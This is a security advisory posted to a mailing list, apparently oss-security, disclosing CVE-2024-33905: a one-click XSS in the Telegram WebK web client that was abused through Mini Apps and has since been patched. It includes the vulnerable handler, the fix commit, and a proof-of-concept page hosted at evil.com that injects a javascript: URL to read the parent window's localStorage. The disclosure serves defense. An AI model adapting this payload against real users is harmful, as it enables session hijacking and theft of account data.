Re: Telegram Web app XSS / Session Hijacking 1-click

[Pedro Batista <pedbap.g () gmail com>]

CVE-2024-33905

On Sun, Apr 28, 2024 at 5:59 PM Pedro Batista <pedbap.g () gmail com> wrote:

> Hi oss-security,
> I would like to share a vulnerability I reported on Telegram Web
> application which is Open Source (https://github.com/morethanwords/tweb).
> The vulnerability is a XSS that can be exploited to achieve session
> hijacking with 1-click using Telegram Mini Apps.
>
> I reported the vulnerability on March 9th, 2024 and Telegram promptly
> fixed it on March 11th, 2024.
>
> # Vulnerable version: Telegram WebK 2.0.0 (486) and below
> # Fixed version: Telegram WebK 2.0.0 (488)
>
> # Attack Surface
> ## Telegram Mini Apps
> “Telegram Mini Apps are essentially web applications that you can run
> directly within the Telegram messenger interface. Mini Apps support
> seamless authorization, integrated crypto and fiat payments (via Google Pay
> and Apple Pay), tailored push notifications, and more.”
>
> > https://core.telegram.org/bots/webapps
> > https://ton.org/mini-apps
>
> Is important to highlight that this feature is heavily used for crypto
> payments in the TON Blockchain.
>
> # Static Analysis
> A cached version of the vulnerable file can be found here:
> - https://web.telegram.org/k/appDialogsManager-aLs9GOvc.js
>
> ```
> telegramWebView.addMultipleEventsListeners({
>        // [...]
>        web_app_open_link:({url:t})=>{window.open(t,"_blank")}
> }
> ```
> The vulnerability was triggered with `postMessage` communication by
> abusing the event `web_app_open_link` which allowed a new URL to remain
> with the javascript context of the parent window using the `javascript:`
> scheme as XSS payload.
>
> # Weaponized Setup
> 1. Attacker creates a Bot + Mini App
> 2. Sets the URL of the Mini App => https://evil.com/homepage.html
> 3. The exploit will be hosted in the homepage of the attacker’s site
> 3.1. homepage.html
> ```
> <body onload=exploit()>
>  <script>
> function exploit() {
>  window.parent.postMessage(JSON.stringify({eventType: 'web_app_open_link',
> eventData: {url:
> "javascript:alert(JSON.stringify(window.parent.localStorage))"}}), '*'); }
>  </script>
> </body>
> ```
>
> # Telegram Patch Commit
>
> https://github.com/morethanwords/tweb/commit/2153ea9878668769faac8dd5931b7e0b96a9f129/src/components/popups/webApp.ts
>
> ```
> export default function
> safeWindowOpen(url: string) {
>     window.open(url, '_blank', 'noreferrer');
> }
> ```
>
> # Demo
> I have published a writeup for this finding which includes the Exploit
> Demo, it's available here:
>
>
> https://medium.com/@pedbap/telegram-web-app-xss-session-hijacking-1-click-95acccdc8d90
>
> I recently requested a CVE for this vulnerability as well, looking forward
> to updating the thread as soon as it is issued.
>
> Thanks for looking into my report.
>
> Best regards,
> Pedro Baptista